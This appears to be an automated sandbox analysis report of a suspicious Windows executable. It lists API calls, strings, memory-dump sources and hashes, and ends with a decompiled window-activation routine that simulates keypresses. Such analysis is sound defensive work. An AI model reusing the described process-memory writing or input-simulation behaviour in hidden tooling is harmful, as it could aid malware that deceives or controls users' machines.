                  • Part of subcall function 003FF3B0: SHGetMalloc.SHELL32(003FF1FC), ref: 003FF3BD
                  • Part of subcall function 003FF3B0: SHGetDesktopFolder.SHELL32(?,004990E8), ref: 003FF3D2
                  • Part of subcall function 003FF3B0: _wcsncpy.LIBCMT ref: 003FF3ED
                  • Part of subcall function 003FF3B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 003FF427
                  • Part of subcall function 003FF3B0: _wcsncpy.LIBCMT ref: 003FF440
                  • Part of subcall function 003FF290: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 003FF2AB
                Strings
                Similarity
                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen_memset
                • String ID: 0WG$PWG$X
                • API String ID: 2873425188-84834689
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: _malloc_wcslen$_wcscpy
                • String ID:
                • API String ID: 1511968408-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                • String ID:
                • API String ID: 4048096073-0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Similarity
                • API ID: _memset$ByteCharMultiWide$_sprintf_strlen_wcslen
                • String ID: C:\Users\user\31956653\thjfdg.xcp$dNG$?T
                • API String ID: 3898977315-3021222585
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _free.LIBCMT ref: 00419524
                  • Part of subcall function 003F35F0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 003F3681
                  • Part of subcall function 003F35F0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003F3697
                  • Part of subcall function 003F35F0: __wsplitpath.LIBCMT ref: 003F36C2
                  • Part of subcall function 003F35F0: _wcscpy.LIBCMT ref: 003F36D7
                  • Part of subcall function 003F35F0: _wcscat.LIBCMT ref: 003F36EC
                  • Part of subcall function 003F35F0: SetCurrentDirectoryW.KERNELBASE(?), ref: 003F36FC
                Strings
                Similarity
                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_wcscat_wcscpy
                • String ID: C:\Users\user\31956653\thjfdg.xcp$DZG
                • API String ID: 2744521063-2490691307
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • _memmove.LIBCMT ref: 003F1D57
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                Strings
                Similarity
                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                • String ID: @EXITCODE
                • API String ID: 2734553683-3436989551
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _strlen.LIBCMT ref: 00422991
                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00444515,00000000,00000000,?,?,?,00444515,?,000000FF), ref: 004229A6
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00444515,00000000,00000000,000000FF), ref: 004229E5
                Similarity
                • API ID: ByteCharMultiWide$_strlen
                • String ID:
                • API String ID: 1433632580-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _wcslen.LIBCMT ref: 003FFE35
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,004443ED,?,00000000,?,?), ref: 003FFE4E
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 003FFE77
                Similarity
                • API ID: ByteCharMultiWide$_wcslen
                • String ID:
                • API String ID: 2761822629-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 003F3B92
                Strings
                Similarity
                • API ID: FileRead
                • String ID: <?
                • API String ID: 2738559852-98613009
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID: std::exception::exception$Exception@8Throw_malloc
                • String ID:
                • API String ID: 2388904642-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SystemParametersInfoW.USER32 ref: 003FD979
                • FreeLibrary.KERNEL32(?), ref: 003FD98E
                Similarity
                • API ID: FreeInfoLibraryParametersSystem
                • String ID:
                • API String ID: 3403648963-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: _malloc_wcscpy_wcslen
                • String ID:
                • API String ID: 245337311-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,003FE094,?,00000001,?,003F3653,?), ref: 004007CA
                • CreateFileW.KERNELBASE(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,003FE094,?,00000001,?,003F3653,?), ref: 00416296
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003F16E5
                  • Part of subcall function 003F2390: _wcslen.LIBCMT ref: 003F239D
                  • Part of subcall function 003F2390: _memmove.LIBCMT ref: 003F23C3
                • _wcscat.LIBCMT ref: 00418BC8
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: FullNamePath_memmove_wcscat_wcslen
                • String ID:
                • API String ID: 189345764-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __lock_file_memset
                • String ID:
                • API String ID: 26237723-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00407E9A: __getptd_noexit.LIBCMT ref: 00407E9A
                • __lock_file.LIBCMT ref: 004049AD
                  • Part of subcall function 00405391: __lock.LIBCMT ref: 004053B6
                • __fclose_nolock.LIBCMT ref: 004049B8
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                • String ID:
                • API String ID: 2800547568-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • timeGetTime.WINMM ref: 003FD5DC
                  • Part of subcall function 003F9430: PeekMessageW.USER32 ref: 003F94B6
                • Sleep.KERNEL32(00000000), ref: 0041E125
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: MessagePeekSleepTimetime
                • String ID:
                • API String ID: 1792118007-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___crtCorExitProcess.LIBCMT ref: 004015AA
                  • Part of subcall function 00401577: GetModuleHandleW.KERNEL32(mscoree.dll,?,004015AF,?,?,0040350A,000000FF,0000001E,00000001,00000000,00000000,?,00406A35,?,00000001,?), ref: 00401581
                  • Part of subcall function 00401577: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00401591
                • ExitProcess.KERNEL32 ref: 004015B3
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: ExitProcess$AddressHandleModuleProc___crt
                • String ID:
                • API String ID: 2427264223-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,003F378C,?,?,?,00000010), ref: 003F3D38
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 003F3D71
                  • Part of subcall function 003F3DA0: _memmove.LIBCMT ref: 003F3DD7
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: ByteCharMultiWide$_malloc_memmove
                • String ID:
                • API String ID: 961785871-0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 003FE248
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WriteProcessMemory.KERNELBASE ref: 00400CCB
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000008,004012DC,00000000,?,00406A7F,?,004012DC,00000000,00000000,00000000,?,0040793E,00000001,00000214,?,004012DC), ref: 0040F5DA
                  • Part of subcall function 00407E9A: __getptd_noexit.LIBCMT ref: 00407E9A
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: AllocateHeap__getptd_noexit
                • String ID:
                • API String ID: 328603210-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                • _memset.LIBCMT ref: 004430E3
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: std::exception::exception$Exception@8Throw_malloc_memset
                • String ID:
                • API String ID: 1169493612-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • _memmove.LIBCMT ref: 0043C17E
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _malloc_memmove
                • String ID:
                • API String ID: 1183979061-0
                • Opcode ID: c365c34210ff95b2339fc68297d86fd64c042ffe90da983951cbe4172abaa356
                • Instruction ID: f2956771a46b83dc8bf1250247639b643a95568cc80308f28d0423b2baee3325
                • Opcode Fuzzy Hash: c365c34210ff95b2339fc68297d86fd64c042ffe90da983951cbe4172abaa356
                • Instruction Fuzzy Hash: 00017174200650AFC721AF59C981D67B7E8EF99744B10885EF8D697702C639FC02CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcscpy
                • String ID:
                • API String ID: 3048848545-0
                • Opcode ID: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
                • Instruction ID: 7edf0b2e17a987865fa45eeb4fb6676dc6e517ce9500816896bcded1e52213ff
                • Opcode Fuzzy Hash: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
                • Instruction Fuzzy Hash: B1F05C331142183596106F66AC42CEBB39CEF93371310062BFA185B182E522744983F4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: fd4eb98bc5c31b184ba657d102e448ce59a1949e6232b37593128c09ce2594a6
                • Instruction ID: 9958db5c138cc601615ef656131045aa20bb8572b3d2b6ed1a21e4557def73cb
                • Opcode Fuzzy Hash: fd4eb98bc5c31b184ba657d102e448ce59a1949e6232b37593128c09ce2594a6
                • Instruction Fuzzy Hash: D7F082713001009FC369AB2CE846D7773E4DFC9314711846EF05AC7255DA39EC418BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • CharUpperBuffW.USER32(?,?), ref: 003FED03
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: BuffCharUpper_malloc
                • String ID:
                • API String ID: 1573836695-0
                • Opcode ID: 9078eb72361205e2b262cd6ba9812fc8f40d600d4a03ef740f1a801219a4fc15
                • Instruction ID: 3f0335d24613e17f32eed16c00218eaedbfc86ea6e92105d2424aa3d94dacdb6
                • Opcode Fuzzy Hash: 9078eb72361205e2b262cd6ba9812fc8f40d600d4a03ef740f1a801219a4fc15
                • Instruction Fuzzy Hash: 01F012706006248FDB215F54E541736B7A4EF04751F05816AFD498F256C774DC01CBD5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,00416F2F), ref: 003FD9DD
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 4e0204f671e7d1510d25c756377ff9799c0bde6a4ea0d8504783902811c4441e
                • Instruction ID: eb15e747c454b14c08b25e3d09a849ef05ac2447ad329b7db107b248b54de0b2
                • Opcode Fuzzy Hash: 4e0204f671e7d1510d25c756377ff9799c0bde6a4ea0d8504783902811c4441e
                • Instruction Fuzzy Hash: FEE04EB4900B019A87318F6AE444416FBF9AFE02213208E1FD5EAC2A64C3B4A1898F50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,00416340,?,00477AAC,00000003,003FE0B0,?,?,00000001), ref: 00433D58
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: 140cb20aced830eed5ce5de5f8d8f8f96b472884116767672cc04b0ecc840f90
                • Instruction ID: e41d2aa864f0b09555650bf4de3605ab4fdc4f7ac5c0cf7fb11def8084f694e4
                • Opcode Fuzzy Hash: 140cb20aced830eed5ce5de5f8d8f8f96b472884116767672cc04b0ecc840f90
                • Instruction Fuzzy Hash: F6E01276100318ABCB50DF98D844FDA77BCEF48760F00851AFA188B200C7B4EA808BE4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 003FE288
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: 01239aa13af2bf130d477de33c6269f321014cf5d34444435aa0b7c7d5c94b3b
                • Instruction ID: 6542a9ea5c7d25e7259abcdb22e0c5545be240ef33f4aece62782724945428e2
                • Opcode Fuzzy Hash: 01239aa13af2bf130d477de33c6269f321014cf5d34444435aa0b7c7d5c94b3b
                • Instruction Fuzzy Hash: 89E01275600208BFC704DFA4DC45DAA7779E748201F008268FD05D7340D671AD5086A5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesW.KERNELBASE(?), ref: 00423984
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: ed736006c9f301a0ce6fc741c094eba95c5302dba2aff9dbec8be4974aa9a385
                • Instruction ID: 76e4296d87789036f81a7c427aaa4ab6cfd668eb6e9c1a3d68b3cd9c2e8bd12d
                • Opcode Fuzzy Hash: ed736006c9f301a0ce6fc741c094eba95c5302dba2aff9dbec8be4974aa9a385
                • Instruction Fuzzy Hash: CEC08071140318568E040DEC754D4D6375C554333D7C41E51F96C876D1C67EBDD3965C
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _doexit.LIBCMT ref: 00401806
                  • Part of subcall function 004016BA: __lock.LIBCMT ref: 004016C8
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __lock_doexit
                • String ID:
                • API String ID: 368792745-0
                • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                • Instruction ID: 19f3d928d41a38a9c1d7ca79ef608110069a83ec2b7c6921bca29636656df928
                • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                • Instruction Fuzzy Hash: EDB0923258020833DA202582AC07F063A1A87C0B64E280521BA0C2A1E1A9A3A9A18089
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wfsopen
                • String ID:
                • API String ID: 197181222-0
                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                • Instruction ID: acc76463798426c7f887c0760da818458ee281c6bc186df88d642c2db19eb8f2
                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                • Instruction Fuzzy Hash: FFC092B744024C77CF112A83ED02F4A3F5A9BC0B64F048021FB1C295A1AA77EA6196D9
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 100%
                			E004243FF(struct HWND__* _a4) {
                				long _v8;
                				int _v12;
                				struct HWND__* _t13;
                				DWORD* _t15;
                				long _t20;
                				int _t24;
                				long _t39;
                				struct HWND__* _t45;
                				long _t46;
                				struct HWND__* _t47;
                
                				_t13 = GetForegroundWindow();
                				_t45 = _a4;
                				_t47 = _t13;
                				if(_t45 != _t47) {
                					if(_t47 == 0) {
                						_t47 = FindWindowW(L"Shell_TrayWnd", _t47);
                					}
                					if(IsIconic(_t45) != 0) {
                						ShowWindow(_t45, 9);
                					}
                					_v12 = 0;
                					_t15 = SetForegroundWindow(_t45);
                					if(_t15 != 0) {
                						return 2;
                					} else {
                						_t46 = GetWindowThreadProcessId(_t47, _t15);
                						_t39 = GetCurrentThreadId();
                						_t20 = GetWindowThreadProcessId(_a4, 0);
                						_v8 = _t20;
                						AttachThreadInput(_t39, _t20, 1);
                						AttachThreadInput(_t39, _t46, 1);
                						AttachThreadInput(_t46, _v8, 1);
                						_t24 = SetForegroundWindow(_a4);
                						if(_t24 != 0) {
                							_v12 = 3;
                						} else {
                							keybd_event(0x12, MapVirtualKeyW(0x12, _t24), _t24, _t24);
                							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
                							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 0, 0);
                							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
                							if(SetForegroundWindow(_a4) != 0) {
                								_v12 = 4;
                							}
                						}
                						AttachThreadInput(_t39, _v8, 0);
                						AttachThreadInput(_t39, _t46, 0);
                						AttachThreadInput(_t46, _v8, 0);
                						return _v12;
                					}
                				} else {
                					return 1;
                				}
                			}














                APIs
                • GetForegroundWindow.USER32 ref: 00424407
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0042442D
                • IsIconic.USER32 ref: 00424436
                • ShowWindow.USER32(?,00000009), ref: 00424443
                • SetForegroundWindow.USER32(?), ref: 00424451
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00424468
                • GetCurrentThreadId.KERNEL32 ref: 0042446C
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042447A
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00424489
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0042448F
                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00424498
                • SetForegroundWindow.USER32(00000000), ref: 0042449E
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004244AD
                • keybd_event.USER32 ref: 004244B6
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004244C4
                • keybd_event.USER32 ref: 004244CD
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004244DB
                • keybd_event.USER32 ref: 004244E4
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004244F2
                • keybd_event.USER32 ref: 004244FB
                • SetForegroundWindow.USER32(00000000), ref: 00424505
                • AttachThreadInput.USER32(00000000,?,00000000), ref: 00424526
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0042452C
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
